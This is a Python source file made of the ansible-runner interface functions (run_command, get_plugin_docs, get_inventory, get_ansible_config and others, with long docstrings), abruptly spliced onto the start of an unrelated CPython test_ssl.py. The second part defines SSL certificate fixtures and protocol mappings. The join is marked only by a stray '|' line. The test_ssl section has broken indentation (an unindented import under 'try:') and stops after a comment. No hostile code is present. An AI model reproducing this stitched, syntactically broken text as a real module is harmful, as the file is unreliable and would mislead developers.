def run_command(executable_cmd, cmdline_args=None, **kwargs):
    '''
    Run an (Ansible) commands in the foreground and return a Runner object when complete.

    :param executable_cmd: The command to be executed.
    :param cmdline_args: A list of arguments to be passed to the executable command.
    :param input_fd: This parameter is applicable when ``runner_mode`` is set to ``subprocess``, it provides the
                     input file descriptor to interact with the sub-process running the command.
    :param output_fd: The output file descriptor to stream the output of command execution.
    :param error_fd: This parameter is applicable when ``runner_mode`` is set to ``subprocess``, it provides the
                     error file descriptor to read the error received while executing the command.
    :param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. If the value of ``input_fd`` parameter
                        is set or the executable command is one of ``ansible-config``, ``ansible-doc`` or ``ansible-galaxy``
                        the default value is set to ``subprocess`` else in other cases it is set to ``pexpect``.
    :param host_cwd: The host current working directory to be mounted within the container (if enabled) and will be
                     the work directory within container.
    :param envvars: Environment variables to be used when running Ansible. Environment variables will also be
                    read from ``env/envvars`` in ``private_data_dir``
    :param passwords: A dictionary containing password prompt patterns and response values used when processing output from
                      Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
    :param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
                     be read from ``env/settings`` in ``private_data_dir``.
    :param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
    :param quiet: Disable all output
    :param json_mode: Store event data in place of stdout on the console and in the stdout file
    :param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
    :param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
    :param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
    :param timeout: The timeout value in seconds that will be passed to either ``pexpect`` or ``subprocess`` invocation
                    (based on ``runner_mode`` selected) while executing command. If the timeout is triggered it will force cancel the
                    execution.
    :param process_isolation: Enable process isolation, using a container engine (e.g. podman).
    :param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
    :param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
    :param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
    :param container_options: List of container options to pass to execution engine.
    :param container_workdir: The working directory within the container.
    :param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
                       This is only used for 'jsonfile' type fact caches.
    :param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
    :param private_data_dir: The directory containing all runner metadata needed to invoke the runner
                             module. Output artifacts will also be stored here for later consumption.
    :param ident: The run identifier for this invocation of Runner. Will be used to create and name
                  the artifact directory holding the results of the invocation.
    :param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
    :param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
    :param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
    :param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
    :param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
    :param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
                                 value is set to 'True' it will raise 'AnsibleRunnerException' exception,
                                 if set to 'False' it logs a debug message and continues execution. Default value is 'False'

    :type executable_cmd: str
    :type cmdline_args: list
    :type input_fd: file descriptor
    :type output_fd: file descriptor
    :type error_fd: file descriptor
    :type runner_mode: str
    :type host_cwd: str
    :type envvars: dict
    :type passwords: dict
    :type settings: dict
    :type private_data_dir: str
    :type project_dir: str
    :type artifact_dir: str
    :type fact_cache_type: str
    :type fact_cache: str
    :type process_isolation: bool
    :type process_isolation_executable: str
    :type container_image: str
    :type container_volume_mounts: list
    :type container_options: list
    :type container_workdir: str
    :type ident: str
    :type rotate_artifacts: int
    :type timeout: int
    :type ssh_key: str
    :type quiet: bool
    :type json_mode: bool
    :type event_handler: function
    :type cancel_callback: function
    :type finished_callback: function
    :type status_handler: function
    :type artifacts_handler: function
    :type check_job_event_data: bool

    :returns: Returns a tuple of response, error string and return code.
              In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
              ``pexpect`` uses same output descriptor for stdout and stderr.
    '''
    # Run synchronously, then drain captured stdout/stderr for the caller.
    r = init_command_config(executable_cmd, cmdline_args=cmdline_args, **kwargs)
    r.run()
    response = r.stdout.read()
    error = r.stderr.read()
    return response, error, r.rc
def run_command_async(executable_cmd, cmdline_args=None, **kwargs):
    '''
    Run an (Ansible) commands in the background which will start immediately. Returns the thread object and a Runner object.

    This uses the same parameters as :py:func:`ansible_runner.interface.run_command`

    :returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
    '''
    # Build the same Runner as run_command(), then launch it on its own
    # thread so the caller can poll/cancel while the command executes.
    runner = init_command_config(executable_cmd, cmdline_args=cmdline_args, **kwargs)
    worker = threading.Thread(target=runner.run)
    worker.start()
    return worker, runner
def init_plugin_docs_config(plugin_names, plugin_type=None, response_format=None,
                            snippet=False, playbook_dir=None, module_path=None, **kwargs):
    '''
    Initialize the Runner() instance

    This function will properly initialize both get_plugin_docs() and get_plugin_docs_async()
    functions in the same way and return a value instance of Runner.

    See parameters given to :py:func:`ansible_runner.interface.get_plugin_docs`
    '''
    # Strip the Runner-level callbacks from kwargs before constructing
    # DocConfig, which only understands config options.
    callbacks = {
        name: kwargs.pop(name, None)
        for name in ('event_handler', 'status_handler', 'artifacts_handler',
                     'cancel_callback', 'finished_callback')
    }
    doc_config = DocConfig(**kwargs)
    doc_config.prepare_plugin_docs_command(plugin_names, plugin_type=plugin_type,
                                           response_format=response_format,
                                           snippet=snippet, playbook_dir=playbook_dir,
                                           module_path=module_path)
    return Runner(doc_config,
                  event_handler=callbacks['event_handler'],
                  status_handler=callbacks['status_handler'],
                  artifacts_handler=callbacks['artifacts_handler'],
                  cancel_callback=callbacks['cancel_callback'],
                  finished_callback=callbacks['finished_callback'])
def get_plugin_docs(plugin_names, plugin_type=None, response_format=None, snippet=False, playbook_dir=None, module_path=None, **kwargs):
    '''
    Run an ansible-doc command to get plugin docs in the foreground and return a Runner object when complete.

    :param plugin_names: The name of the plugins to get docs.
    :param plugin_type: The type of the plugin mentioned in plugins_names. Valid values are ``become``, ``cache``, ``callback``,
                        ``cliconf``, ``connection``, ``httpapi``, ``inventory``, ``lookup``, ``netconf``, ``shell``, ``vars``,
                        ``module``, ``strategy``. If the value is not provided it defaults to ``module``.
    :param response_format: The output format for response. Valid values can be one of ``json`` or ``human`` and the response
                            is either json string or plain text in human readable format. Default value is ``json``.
    :param snippet: Show playbook snippet for specified plugin(s).
    :param playbook_dir: This parameter is used to set the relative path to handle playbook adjacent installed plugins.
    :param module_path: This parameter prepends colon-separated path(s) to module library
                        (default=~/.ansible/plugins/modules:/usr/share/ansible/plugins/modules).
    :param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
    :param host_cwd: The host current working directory to be mounted within the container (if enabled) and will be
                     the work directory within container.
    :param envvars: Environment variables to be used when running Ansible. Environment variables will also be
                    read from ``env/envvars`` in ``private_data_dir``
    :param passwords: A dictionary containing password prompt patterns and response values used when processing output from
                      Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
    :param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
                     be read from ``env/settings`` in ``private_data_dir``.
    :param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
    :param quiet: Disable all output
    :param json_mode: Store event data in place of stdout on the console and in the stdout file
    :param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
    :param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
    :param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
    :param timeout: The timeout value in seconds that will be passed to either ``pexpect`` or ``subprocess`` invocation
                    (based on ``runner_mode`` selected) while executing command. If the timeout is triggered it will force cancel the
                    execution.
    :param process_isolation: Enable process isolation, using a container engine (e.g. podman).
    :param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
    :param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
    :param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
    :param container_options: List of container options to pass to execution engine.
    :param container_workdir: The working directory within the container.
    :param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
                       This is only used for 'jsonfile' type fact caches.
    :param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
    :param private_data_dir: The directory containing all runner metadata needed to invoke the runner
                             module. Output artifacts will also be stored here for later consumption.
    :param ident: The run identifier for this invocation of Runner. Will be used to create and name
                  the artifact directory holding the results of the invocation.
    :param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
    :param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
    :param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
    :param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
    :param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
    :param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
                                 value is set to 'True' it will raise 'AnsibleRunnerException' exception,
                                 if set to 'False' it logs a debug message and continues execution. Default value is 'False'

    :type plugin_names: list
    :type plugin_type: str
    :type response_format: str
    :type snippet: bool
    :type playbook_dir: str
    :type module_path: str
    :type runner_mode: str
    :type host_cwd: str
    :type envvars: dict
    :type passwords: dict
    :type settings: dict
    :type private_data_dir: str
    :type project_dir: str
    :type artifact_dir: str
    :type fact_cache_type: str
    :type fact_cache: str
    :type process_isolation: bool
    :type process_isolation_executable: str
    :type container_image: str
    :type container_volume_mounts: list
    :type container_options: list
    :type container_workdir: str
    :type ident: str
    :type rotate_artifacts: int
    :type timeout: int
    :type ssh_key: str
    :type quiet: bool
    :type json_mode: bool
    :type event_handler: function
    :type cancel_callback: function
    :type finished_callback: function
    :type status_handler: function
    :type artifacts_handler: function
    :type check_job_event_data: bool

    :returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
              ``pexpect`` uses same output descriptor for stdout and stderr. If the value of ``response_format`` is ``json``
              it returns a python dictionary object.
    '''
    r = init_plugin_docs_config(plugin_names, plugin_type=plugin_type, response_format=response_format,
                                snippet=snippet, playbook_dir=playbook_dir, module_path=module_path, **kwargs)
    r.run()
    response = r.stdout.read()
    error = r.stderr.read()
    if response and response_format == 'json':
        # 'santize_json_response' is a project helper (its name is misspelled
        # at the definition site, so it must stay spelled this way here).
        response = json.loads(santize_json_response(response))
    return response, error
def get_plugin_docs_async(plugin_names, plugin_type=None, response_format=None, snippet=False, playbook_dir=None, module_path=None, **kwargs):
    '''
    Run an ansible-doc command in the background which will start immediately. Returns the thread object and a Runner object.

    This uses the same parameters as :py:func:`ansible_runner.interface.get_plugin_docs`

    :returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
    '''
    # Identical setup to get_plugin_docs(), but the run happens on a
    # separate thread so this call returns immediately.
    runner = init_plugin_docs_config(plugin_names, plugin_type=plugin_type,
                                     response_format=response_format, snippet=snippet,
                                     playbook_dir=playbook_dir, module_path=module_path,
                                     **kwargs)
    docs_thread = threading.Thread(target=runner.run)
    docs_thread.start()
    return docs_thread, runner
def get_plugin_list(list_files=None, response_format=None, plugin_type=None, playbook_dir=None, module_path=None, **kwargs):
    '''
    Run an ansible-doc command to get list of installed Ansible plugins.

    :param list_files: When the boolean parameter is set to ``True``, returns the file path of the plugin along with the plugin name.
    :param response_format: The output format for response. Valid values can be one of ``json`` or ``human`` and the response
                            is either json string or plain text in human readable format. Default value is ``json``.
    :param plugin_type: The type of the plugin mentioned in plugins_names. Valid values are ``become``, ``cache``, ``callback``,
                        ``cliconf``, ``connection``, ``httpapi``, ``inventory``, ``lookup``, ``netconf``, ``shell``, ``vars``,
                        ``module``, ``strategy``. If the value is not provided it defaults to ``module``.
    :param playbook_dir: This parameter is used to set the relative path to handle playbook adjacent installed plugins.
    :param module_path: This parameter prepends colon-separated path(s) to module library
                        (default=~/.ansible/plugins/modules:/usr/share/ansible/plugins/modules).
    :param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
    :param host_cwd: The host current working directory to be mounted within the container (if enabled) and will be
                     the work directory within container.
    :param envvars: Environment variables to be used when running Ansible. Environment variables will also be
                    read from ``env/envvars`` in ``private_data_dir``
    :param passwords: A dictionary containing password prompt patterns and response values used when processing output from
                      Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
    :param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
                     be read from ``env/settings`` in ``private_data_dir``.
    :param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
    :param quiet: Disable all output
    :param json_mode: Store event data in place of stdout on the console and in the stdout file
    :param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
    :param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
    :param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
    :param timeout: The timeout value in seconds that will be passed to either ``pexpect`` or ``subprocess`` invocation
                    (based on ``runner_mode`` selected) while executing command. If the timeout is triggered it will force cancel the
                    execution.
    :param process_isolation: Enable process isolation, using a container engine (e.g. podman).
    :param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
    :param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
    :param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
    :param container_options: List of container options to pass to execution engine.
    :param container_workdir: The working directory within the container.
    :param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
                       This is only used for 'jsonfile' type fact caches.
    :param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
    :param private_data_dir: The directory containing all runner metadata needed to invoke the runner
                             module. Output artifacts will also be stored here for later consumption.
    :param ident: The run identifier for this invocation of Runner. Will be used to create and name
                  the artifact directory holding the results of the invocation.
    :param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
    :param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
    :param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
    :param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout)
    :param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
    :param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
                                 value is set to 'True' it will raise 'AnsibleRunnerException' exception,
                                 if set to 'False' it logs a debug message and continues execution. Default value is 'False'

    :type list_files: bool
    :type plugin_type: str
    :type response_format: str
    :type playbook_dir: str
    :type module_path: str
    :type runner_mode: str
    :type host_cwd: str
    :type envvars: dict
    :type passwords: dict
    :type settings: dict
    :type private_data_dir: str
    :type project_dir: str
    :type artifact_dir: str
    :type fact_cache_type: str
    :type fact_cache: str
    :type process_isolation: bool
    :type process_isolation_executable: str
    :type container_image: str
    :type container_volume_mounts: list
    :type container_options: list
    :type container_workdir: str
    :type ident: str
    :type rotate_artifacts: int
    :type timeout: int
    :type ssh_key: str
    :type quiet: bool
    :type json_mode: bool
    :type event_handler: function
    :type cancel_callback: function
    :type finished_callback: function
    :type status_handler: function
    :type artifacts_handler: function
    :type check_job_event_data: bool

    :returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
              ``pexpect`` uses same output descriptor for stdout and stderr. If the value of ``response_format`` is ``json``
              it returns a python dictionary object.
    '''
    # Runner-level callbacks must be removed before DocConfig(**kwargs).
    event_callback_handler = kwargs.pop('event_handler', None)
    status_callback_handler = kwargs.pop('status_handler', None)
    artifacts_handler = kwargs.pop('artifacts_handler', None)
    cancel_callback = kwargs.pop('cancel_callback', None)
    finished_callback = kwargs.pop('finished_callback', None)
    rd = DocConfig(**kwargs)
    rd.prepare_plugin_list_command(list_files=list_files, response_format=response_format, plugin_type=plugin_type,
                                   playbook_dir=playbook_dir, module_path=module_path)
    r = Runner(rd,
               event_handler=event_callback_handler,
               status_handler=status_callback_handler,
               artifacts_handler=artifacts_handler,
               cancel_callback=cancel_callback,
               finished_callback=finished_callback)
    r.run()
    response = r.stdout.read()
    error = r.stderr.read()
    if response and response_format == 'json':
        # 'santize_json_response' is a project helper (its name is misspelled
        # at the definition site, so it must stay spelled this way here).
        response = json.loads(santize_json_response(response))
    return response, error
def get_inventory(action, inventories, response_format=None, host=None, playbook_dir=None,
                  vault_ids=None, vault_password_file=None, output_file=None, export=None, **kwargs):
    '''
    Run an ansible-inventory command to get inventory related details.

    :param action: Valid values are one of ``graph``, ``host``, ``list``.
        ``graph`` creates an inventory graph, ``host`` returns specific host info and works as an inventory script and
        ``list`` outputs all hosts info and also works as an inventory script.
    :param inventories: List of inventory host paths.
    :param response_format: The output format for response. Valid values can be one of ``json``, ``yaml``, ``toml``.
        Default is ``json``. If ``action`` is ``graph`` the only allowed value is ``json``.
    :param host: When ``action`` is set to ``host`` this parameter is used to get the host specific information.
    :param playbook_dir: This parameter is used to set the relative path for the inventory.
    :param vault_ids: The vault identity to use.
    :param vault_password_file: The vault password files to use.
    :param output_file: The file path in which inventory details should be sent to.
    :param export: The boolean value, if set, represents in a way that is optimized for export, not as an accurate
        representation of how Ansible has processed it.
    :param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
    :param host_cwd: The host current working directory to be mounted within the container (if enabled) and will be
        the work directory within container.
    :param envvars: Environment variables to be used when running Ansible. Environment variables will also be
        read from ``env/envvars`` in ``private_data_dir``.
    :param passwords: A dictionary containing password prompt patterns and response values used when processing output from
        Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
    :param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
        be read from ``env/settings`` in ``private_data_dir``.
    :param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
    :param quiet: Disable all output.
    :param json_mode: Store event data in place of stdout on the console and in the stdout file.
    :param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir.
    :param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir.
    :param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default.
    :param timeout: The timeout value in seconds that will be passed to either ``pexpect`` or ``subprocess`` invocation
        (based on ``runner_mode`` selected) while executing command. If the timeout is triggered it will force cancel the
        execution.
    :param process_isolation: Enable process isolation, using a container engine (e.g. podman).
    :param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
    :param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
    :param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels'. (default: None)
    :param container_options: List of container options to pass to execution engine.
    :param container_workdir: The working directory within the container.
    :param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
        This is only used for 'jsonfile' type fact caches.
    :param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
    :param private_data_dir: The directory containing all runner metadata needed to invoke the runner
        module. Output artifacts will also be stored here for later consumption.
    :param ident: The run identifier for this invocation of Runner. Will be used to create and name
        the artifact directory holding the results of the invocation.
    :param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event.
    :param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False).
    :param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
    :param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout).
    :param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
    :param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
        the value is set to 'True' it will raise an 'AnsibleRunnerException' exception;
        if set to 'False' it logs a debug message and continues execution. Default value is 'False'.

    :type action: str
    :type inventories: list
    :type response_format: str
    :type host: str
    :type playbook_dir: str
    :type vault_ids: str
    :type vault_password_file: str
    :type output_file: str
    :type export: bool
    :type runner_mode: str
    :type host_cwd: str
    :type envvars: dict
    :type passwords: dict
    :type settings: dict
    :type private_data_dir: str
    :type project_dir: str
    :type artifact_dir: str
    :type fact_cache_type: str
    :type fact_cache: str
    :type process_isolation: bool
    :type process_isolation_executable: str
    :type container_image: str
    :type container_volume_mounts: list
    :type container_options: list
    :type container_workdir: str
    :type ident: str
    :type rotate_artifacts: int
    :type timeout: int
    :type ssh_key: str
    :type quiet: bool
    :type json_mode: bool
    :type event_handler: function
    :type cancel_callback: function
    :type finished_callback: function
    :type status_handler: function
    :type artifacts_handler: function
    :type check_job_event_data: bool

    :returns: Returns a tuple of response and error string. In case ``runner_mode`` is set to ``pexpect`` the error value is
        empty as ``pexpect`` uses the same output descriptor for stdout and stderr. If the value of ``response_format`` is
        ``json`` it returns a python dictionary object.
    '''
    # The callback arguments belong to Runner, not to the config object --
    # pull them out of kwargs before building the InventoryConfig.
    callbacks = {
        name: kwargs.pop(name, None)
        for name in ('event_handler', 'status_handler', 'artifacts_handler',
                     'cancel_callback', 'finished_callback')
    }
    inventory_config = InventoryConfig(**kwargs)
    inventory_config.prepare_inventory_command(
        action=action, inventories=inventories, response_format=response_format,
        host=host, playbook_dir=playbook_dir, vault_ids=vault_ids,
        vault_password_file=vault_password_file, output_file=output_file, export=export)
    runner = Runner(inventory_config,
                    event_handler=callbacks['event_handler'],
                    status_handler=callbacks['status_handler'],
                    artifacts_handler=callbacks['artifacts_handler'],
                    cancel_callback=callbacks['cancel_callback'],
                    finished_callback=callbacks['finished_callback'])
    runner.run()
    response = runner.stdout.read()
    error = runner.stderr.read()
    if response and response_format == 'json':
        response = json.loads(santize_json_response(response))
    return response, error
def get_ansible_config(action, config_file=None, only_changed=None, **kwargs):
    '''
    Run an ansible-config command to get ansible configuration related details.

    :param action: Valid values are one of ``list``, ``dump``, ``view``.
        ``list`` returns all config options, ``dump`` returns the active configuration and
        ``view`` returns the view of configuration file.
    :param config_file: Path to configuration file, defaults to first file found in precedence.
    :param only_changed: The boolean value when set to ``True`` returns only the configurations that have changed
        from the default. This parameter is applicable only when ``action`` is set to ``dump``.
    :param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
    :param host_cwd: The current working directory from which the command in executable_cmd should be executed.
    :param envvars: Environment variables to be used when running Ansible. Environment variables will also be
        read from ``env/envvars`` in ``private_data_dir``.
    :param passwords: A dictionary containing password prompt patterns and response values used when processing output from Ansible.
        Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
    :param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
        be read from ``env/settings`` in ``private_data_dir``.
    :param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
    :param quiet: Disable all output.
    :param json_mode: Store event data in place of stdout on the console and in the stdout file.
    :param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir.
    :param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir.
    :param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default.
    :param timeout: The timeout value in seconds that will be passed to either ``pexpect`` or ``subprocess`` invocation
        (based on ``runner_mode`` selected) while executing command. If the timeout is triggered it will force cancel the
        execution.
    :param process_isolation: Enable process isolation, using a container engine (e.g. podman).
    :param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
    :param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
    :param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels'. (default: None)
    :param container_options: List of container options to pass to execution engine.
    :param container_workdir: The working directory within the container.
    :param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
        This is only used for 'jsonfile' type fact caches.
    :param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
    :param private_data_dir: The directory containing all runner metadata needed to invoke the runner
        module. Output artifacts will also be stored here for later consumption.
    :param ident: The run identifier for this invocation of Runner. Will be used to create and name
        the artifact directory holding the results of the invocation.
    :param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event.
    :param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False).
    :param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
    :param status_handler: An optional callback that will be invoked any time the status changes (e.g. started, running, failed, successful, timeout).
    :param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
    :param check_job_event_data: Check if job events data is completely generated. If event data is not completely generated and if
        the value is set to 'True' it will raise an 'AnsibleRunnerException' exception;
        if set to 'False' it logs a debug message and continues execution. Default value is 'False'.

    :type action: str
    :type config_file: str
    :type only_changed: bool
    :type runner_mode: str
    :type host_cwd: str
    :type envvars: dict
    :type passwords: dict
    :type settings: dict
    :type private_data_dir: str
    :type project_dir: str
    :type artifact_dir: str
    :type fact_cache_type: str
    :type fact_cache: str
    :type process_isolation: bool
    :type process_isolation_executable: str
    :type container_image: str
    :type container_volume_mounts: list
    :type container_options: list
    :type container_workdir: str
    :type ident: str
    :type rotate_artifacts: int
    :type timeout: int
    :type ssh_key: str
    :type quiet: bool
    :type json_mode: bool
    :type event_handler: function
    :type cancel_callback: function
    :type finished_callback: function
    :type status_handler: function
    :type artifacts_handler: function
    :type check_job_event_data: bool

    :returns: Returns a tuple of response and error string. In case ``runner_mode`` is set to ``pexpect`` the error value is
        empty as ``pexpect`` uses the same output descriptor for stdout and stderr.
    '''
    # Runner callbacks travel in **kwargs but belong to Runner, not the config.
    callbacks = {
        name: kwargs.pop(name, None)
        for name in ('event_handler', 'status_handler', 'artifacts_handler',
                     'cancel_callback', 'finished_callback')
    }
    cfg = AnsibleCfgConfig(**kwargs)
    cfg.prepare_ansible_config_command(action=action, config_file=config_file, only_changed=only_changed)
    runner = Runner(cfg,
                    event_handler=callbacks['event_handler'],
                    status_handler=callbacks['status_handler'],
                    artifacts_handler=callbacks['artifacts_handler'],
                    cancel_callback=callbacks['cancel_callback'],
                    finished_callback=callbacks['finished_callback'])
    runner.run()
    return runner.stdout.read(), runner.stderr.read()
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
# The ssl module is optional; skip this whole test module when it is missing.
ssl = support.import_module("ssl")

from ssl import TLSVersion, _TLSContentType, _TLSMessageType

# True on debug builds (sys.gettotalrefcount only exists there).
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'

# All PROTOCOL_* names known to this ssl build, sorted for stable iteration.
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
# Compile-time default cipher list, if exposed by this interpreter build.
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')

# Map legacy PROTOCOL_* constants to a corresponding TLSVersion value
# (presumably the version each protocol constant implies -- used by tests),
# skipping any constant this OpenSSL build does not provide.
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
    ("PROTOCOL_SSLv23", "SSLv3"),
    ("PROTOCOL_TLSv1", "TLSv1"),
    ("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
    try:
        proto = getattr(ssl, proto)
        ver = getattr(ssl.TLSVersion, ver)
    except AttributeError:
        continue
    PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
    """Return the path of a test-data file located next to this module."""
    here = os.path.dirname(__file__)
    return os.path.join(here, *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
# Certificate / key fixtures used throughout the tests.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
# Password-protected variants (unlocked with KEY_PASSWORD below).
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")

# Expected ssl._ssl._test_decode_cert() output for CERTFILE.
CERTFILE_INFO = {
    'issuer': ((('countryName', 'XY'),),
               (('localityName', 'Castle Anthrax'),),
               (('organizationName', 'Python Software Foundation'),),
               (('commonName', 'localhost'),)),
    'notAfter': 'Aug 26 14:23:15 2028 GMT',
    'notBefore': 'Aug 29 14:23:15 2018 GMT',
    'serialNumber': '98A7CF88C74A32ED',
    'subject': ((('countryName', 'XY'),),
                (('localityName', 'Castle Anthrax'),),
                (('organizationName', 'Python Software Foundation'),),
                (('commonName', 'localhost'),)),
    'subjectAltName': (('DNS', 'localhost'),),
    'version': 3
}

# empty CRL
CRLFILE = data_file("revocation.crl")

# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'

# Expected ssl._ssl._test_decode_cert() output for SIGNED_CERTFILE.
